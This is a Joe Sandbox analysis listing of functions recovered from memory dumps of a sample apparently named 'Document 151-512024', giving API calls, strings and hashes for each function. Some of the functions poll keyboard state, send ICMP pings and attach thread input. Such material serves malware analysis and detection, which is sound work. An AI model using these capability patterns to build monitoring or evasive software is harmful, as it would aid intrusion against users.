Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: c0200cedba633d7a6e361d610c97a1ec23537fb519d0f32065c78b6f44ea2399
Instruction ID: e27cc9e4d2a7b8fcb3a5f02e5386201da60e7ba65e20d0528027c700d802966c
Opcode Fuzzy Hash: c0200cedba633d7a6e361d610c97a1ec23537fb519d0f32065c78b6f44ea2399
Instruction Fuzzy Hash: 7FC13975A04109AFCB14DFA4C984DAEBBF9FF88314B148599F81A9B361D730EE45CB90

Function 0099FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0099FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0099FB08
VariantInit.OLEAUT32(?), ref: 0099FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0099FB3A
VariantCopy.OLEAUT32(?,?), ref: 0099FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0099FBA1
VariantClear.OLEAUT32(?), ref: 0099FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0099FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0099FBCC
VariantClear.OLEAUT32(?), ref: 0099FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0099FBE9

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 9e64d4a9463661bcc8e05e6087551e272d8a70ff2dc91b18d62a38cd7b482dff
Instruction ID: 6c6cdc7d0c153e5b91339dc4688254fa801389049231b60886770dddc4d40a2b
Opcode Fuzzy Hash: 9e64d4a9463661bcc8e05e6087551e272d8a70ff2dc91b18d62a38cd7b482dff
Instruction Fuzzy Hash: 78416075A1521AAFCF00DF68C864DAEBBB9FF58344F008069F945E7261DB34A945CF90

Function 009A9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009A9CA1
GetAsyncKeyState.USER32(000000A0), ref: 009A9D22
GetKeyState.USER32(000000A0), ref: 009A9D3D
GetAsyncKeyState.USER32(000000A1), ref: 009A9D57
GetKeyState.USER32(000000A1), ref: 009A9D6C
GetAsyncKeyState.USER32(00000011), ref: 009A9D84
GetKeyState.USER32(00000011), ref: 009A9D96
GetAsyncKeyState.USER32(00000012), ref: 009A9DAE
GetKeyState.USER32(00000012), ref: 009A9DC0
GetAsyncKeyState.USER32(0000005B), ref: 009A9DD8
GetKeyState.USER32(0000005B), ref: 009A9DEA

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 87de796a5c808f2e05b0981db1b28cd93b6455c0fa4ea9616689bbff2d4a8372
Instruction ID: 68ceb95d24d23e4027987676e964bf90473d47be470632180cd4259e92307860
Opcode Fuzzy Hash: 87de796a5c808f2e05b0981db1b28cd93b6455c0fa4ea9616689bbff2d4a8372
Instruction Fuzzy Hash: E541EB74548BCA6DFF30876084443B5BEF8BF13354F04805AE6C6566C2D7A499C4C7D2

Function 009C055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009C05BC
inet_addr.WSOCK32(?), ref: 009C061C
gethostbyname.WSOCK32(?), ref: 009C0628
IcmpCreateFile.IPHLPAPI ref: 009C0636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009C06C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009C06E5
IcmpCloseHandle.IPHLPAPI(?), ref: 009C07B9
WSACleanup.WSOCK32 ref: 009C07BF

Strings

Ping, xrefs: 009C0676

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 51dc3890b8e62267119c0bdc50f92a5285ed6f9fa2641830ecdf646360794b14
Instruction ID: 340450f87434be2178a0989c4bac231176d5a98ffa60183278b83aec237966e3
Opcode Fuzzy Hash: 51dc3890b8e62267119c0bdc50f92a5285ed6f9fa2641830ecdf646360794b14
Instruction Fuzzy Hash: 4C918C75A08201DFD724CF15C989F1ABBE4AF84318F1489ADF4698B6A2C734ED45CF92

Function 009C8CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 009C8CF3

Part of subcall function 009A8E54: _wcslen.LIBCMT ref: 009A8E77

_wcslen.LIBCMT ref: 009C8D4E
_wcslen.LIBCMT ref: 009C8D9C
_wcslen.LIBCMT ref: 009C8DDC
_wcslen.LIBCMT ref: 009C8E6E

Strings

stdcall, xrefs: 009C8DD6, 009C8DDB
winapi, xrefs: 009C8D96, 009C8D9B
none, xrefs: 009C8E65, 009C8E6A
cdecl, xrefs: 009C8D48, 009C8D4D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: 327a5ff1b9a637f74c77e232205c57a8fa53c5b38dc934d27f3a5e946c5b06ac
Instruction ID: 8145e0bb77a0c45b2d877f22c7b6fe96ee3df61069db7b647ee1091b77f57f09
Opcode Fuzzy Hash: 327a5ff1b9a637f74c77e232205c57a8fa53c5b38dc934d27f3a5e946c5b06ac
Instruction Fuzzy Hash: 2F519D31E00116ABCB14EF68C940EBFB7A9BF64724B20462DE826E72C5DB35DE40C791

Function 009C372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 009C3774
CoUninitialize.OLE32 ref: 009C377F
CoCreateInstance.OLE32(?,00000000,00000017,009DFB78,?), ref: 009C37D9
IIDFromString.OLE32(?,?), ref: 009C384C
VariantInit.OLEAUT32(?), ref: 009C38E4
VariantClear.OLEAUT32(?), ref: 009C3936

Strings

Failed to create object, xrefs: 009C37E4, 009C389A
Invalid parameter, xrefs: 009C3865
NULL Pointer assignment, xrefs: 009C381E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 623d8073f77db6f32696fa61c8fcfda1cf8e693674ffcc7af2a3e91e67e0cb92
Instruction ID: 040bf36b893517dbeef14a61bf281a70b0b08c4829e42927d89bacb46a5c1ea0
Opcode Fuzzy Hash: 623d8073f77db6f32696fa61c8fcfda1cf8e693674ffcc7af2a3e91e67e0cb92
Instruction Fuzzy Hash: BA617C70A08311AFD310DF54C849F6AB7E8EF89714F10890DF9859B291D774EE48CB92

Function 009D8B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00959BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00959BB2

Part of subcall function 0095912D: GetCursorPos.USER32(?), ref: 00959141
Part of subcall function 0095912D: ScreenToClient.USER32(00000000,?), ref: 0095915E
Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000001), ref: 00959183
Part of subcall function 0095912D: GetAsyncKeyState.USER32(00000002), ref: 0095919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 009D8B6B
ImageList_EndDrag.COMCTL32 ref: 009D8B71
ReleaseCapture.USER32 ref: 009D8B77
SetWindowTextW.USER32(?,00000000), ref: 009D8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009D8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 009D8CFF

Strings

@GUI_DROPID, xrefs: 009D8C51
0n, xrefs: 009D8BB4, 009D8BEE
@GUI_DRAGFILE, xrefs: 009D8C9A

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: 0n$@GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2804489615
Opcode ID: 7a2d8146a50a477e72bb270410226471ac232510e0589e414855057a826843a1
Instruction ID: 088b8bcd3bd4a9ce416d1544d1b6a8cce5535658b68fd1e8e11e5458fdf1aa44
Opcode Fuzzy Hash: 7a2d8146a50a477e72bb270410226471ac232510e0589e414855057a826843a1
Instruction Fuzzy Hash: E7517D70145304AFD700DF24DC96FAA77E4FB88715F40462EF996972E2DB709944CB62

Function 009B3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009B33CF

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009B33F0

Strings

"%s" (%d) : ==> %s:, xrefs: 009B3522
^ ERROR , xrefs: 009B349E
"%s" (%d) : ==> %s:%s%s, xrefs: 009B3504
Line %d (File "%s"):, xrefs: 009B3443, 009B345C
Incorrect parameters to object property !, xrefs: 009B34AB
Error: , xrefs: 009B34D1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 50e4c76f155ea6672faef373485ca0a5fbfbb52ae6ec3886e519d825d55cf358
Instruction ID: 7438fdf84314fa6d9e089c0c8bd7d50b1edb253a1a1bc7065dc05721c4513058
Opcode Fuzzy Hash: 50e4c76f155ea6672faef373485ca0a5fbfbb52ae6ec3886e519d825d55cf358
Instruction Fuzzy Hash: 6A518B7294020ABADF14EBE0DE46EEEB378EF44344F108565F509721A2EB712F58DB61

Function 009AB5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009AB5FC
_wcslen.LIBCMT ref: 009AB608
_wcslen.LIBCMT ref: 009AB64D
_wcslen.LIBCMT ref: 009AB68C
_wcslen.LIBCMT ref: 009AB6C7

Strings

APPEND, xrefs: 009AB6C1, 009AB6C6
KEYS, xrefs: 009AB647, 009AB64C
REMOVE, xrefs: 009AB602, 009AB607
EXISTS, xrefs: 009AB686, 009AB68B

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: c8a042ef174d02c3ba9982be937892d102a455407c267e1d573cbc8bc197a180
Instruction ID: 12b5b290a6ae07537d2d1b9fcc0ba085214de66b16da8cde26dee0bcb7712c5a
Opcode Fuzzy Hash: c8a042ef174d02c3ba9982be937892d102a455407c267e1d573cbc8bc197a180
Instruction Fuzzy Hash: F241E932A000279BCB105F7DC9905BE77A9BFA2BB8B254129E521DB286E735CD81C7D0

Function 009ABC5E Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009ABCFD
IsMenu.USER32(00000000), ref: 009ABD1D
CreatePopupMenu.USER32 ref: 009ABD53
GetMenuItemCount.USER32(Pl), ref: 009ABDA4
InsertMenuItemW.USER32(Pl,?,00000001,00000030), ref: 009ABDCC

Strings

2, xrefs: 009ABD37
Pl, xrefs: 009ABCE3, 009ABCBC, 009ABDCA
Pl, xrefs: 009ABD2B, 009ABDA3
0, xrefs: 009ABCA8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2$Pl$Pl
API String ID: 93392585-182278678
Opcode ID: 05281a33f1d650f64c265b5f06e6269d2f01cc4b352eadbe5a50a8c88d6f22ef
Instruction ID: a256475740505655403886444590224f474e61375c2217f8c48f0991a027f287
Opcode Fuzzy Hash: 05281a33f1d650f64c265b5f06e6269d2f01cc4b352eadbe5a50a8c88d6f22ef
Instruction Fuzzy Hash: F7519EB0A042059BDF10CFB8D884BAEBBF8BF86314F14465AF551EB2D2D7709941CBA1

Function 009B5393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009B53A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009B5416
GetLastError.KERNEL32 ref: 009B5420
SetErrorMode.KERNEL32(00000000,READY), ref: 009B54A7

Strings

INVALID, xrefs: 009B5459
READY, xrefs: 009B5460, 009B5468
UNKNOWN, xrefs: 009B5444
NOTREADY, xrefs: 009B544B
READONLY, xrefs: 009B5452

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 0d0db4e2635d085b91c17d2d6b2824d3beaf26ec8f432a36e6347434477b3482
Instruction ID: 8bbcbcbee431fbbdffba5f0467b80a0c190a9fe28d718d7bc0420d63279ffb5d
Opcode Fuzzy Hash: 0d0db4e2635d085b91c17d2d6b2824d3beaf26ec8f432a36e6347434477b3482
Instruction Fuzzy Hash: F831F275A006099FD710DF68C688FEABBB9EF44319F158069E405CF2A2DB71DD86CB90

Function 009AB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009AB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB165
GetWindowThreadProcessId.USER32(00000000), ref: 009AB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 009AB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009AA1E1,?,00000001), ref: 009AB21D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: efd5caede0cce1f1d46db2fadae037b8946d2821f9b8679715c143d8b2475a12
Instruction ID: ccffdbd1eaf59b0ac46f97b22b00e092f23260a82269ff58f7534c380c5f0284
Opcode Fuzzy Hash: efd5caede0cce1f1d46db2fadae037b8946d2821f9b8679715c143d8b2475a12
Instruction Fuzzy Hash: 7231EEBA154205BFDF10DFA4EC48BAD7BADBB26391F108006FA12D6191D7B49E41CFA0

Function 00972C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00972C94

Part of subcall function 009729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000), ref: 009729DE
Part of subcall function 009729C8: GetLastError.KERNEL32(00000000,?,0097D7D1,00000000,00000000,00000000,00000000,?,0097D7F8,00000000,00000007,00000000,?,0097DBF5,00000000,00000000), ref: 009729F0

_free.LIBCMT ref: 00972CA0
_free.LIBCMT ref: 00972CAB
_free.LIBCMT ref: 00972CB6
_free.LIBCMT ref: 00972CC1
_free.LIBCMT ref: 00972CCC
_free.LIBCMT ref: 00972CD7
_free.LIBCMT ref: 00972CE2
_free.LIBCMT ref: 00972CED
_free.LIBCMT ref: 00972CFB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e87e11f075a75d61b28e8c5ced452a1592fbe651d0633d65411cd3b060b68594
Instruction ID: 1496e59e0edfc934033ac9ee55bcf0aa0887c3ec38cf471ba75d77ca2160d64e
Opcode Fuzzy Hash: e87e11f075a75d61b28e8c5ced452a1592fbe651d0633d65411cd3b060b68594
Instruction Fuzzy Hash: 6E11B976120108BFCB02EF64D942DDD7BA5FF45350F4584A5FA4C5F222D631EE909B90

Function 00941410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00941459
OleUninitialize.OLE32(?,00000000), ref: 009414F8
UnregisterHotKey.USER32(?), ref: 009416DD
DestroyWindow.USER32(?), ref: 009824B9
FreeLibrary.KERNEL32(?), ref: 0098251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0098254B

Strings

close all, xrefs: 00941454

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 88542bc71401b71d229dbc6f71e3c2a327b3df4929b38487ceab4b049effa1fb
Instruction ID: 935c57d3d3bb0454ab29dbf065cf264bc484da7e83278564a1b1b8d5d625aae0
Opcode Fuzzy Hash: 88542bc71401b71d229dbc6f71e3c2a327b3df4929b38487ceab4b049effa1fb
Instruction Fuzzy Hash: 53D148717012128FCB29EF15C499F69F7A4BF45710F1442AEE84AAB362DB30AD56CF50

Function 009B7DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009B7FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 009B7FC1
GetFileAttributesW.KERNEL32(?), ref: 009B7FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 009B8005
SetCurrentDirectoryW.KERNEL32(?), ref: 009B8017
SetCurrentDirectoryW.KERNEL32(?), ref: 009B8060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009B80B0

Strings

*.*, xrefs: 009B8066

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: f660884942a5e2340bdc33b391443763e183ec5c466dac0fc90e45bd76ac297b
Instruction ID: 8eb121fa3b228c79927f84024f50fb38bfd4b6646fe244d99934b63b0145ad51
Opcode Fuzzy Hash: f660884942a5e2340bdc33b391443763e183ec5c466dac0fc90e45bd76ac297b
Instruction Fuzzy Hash: CE818E725082059BCB20EF94C944AEAF3E8AFC9360F144D5EF885D7260EB35DD49CB52

Function 00945BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00945C7A

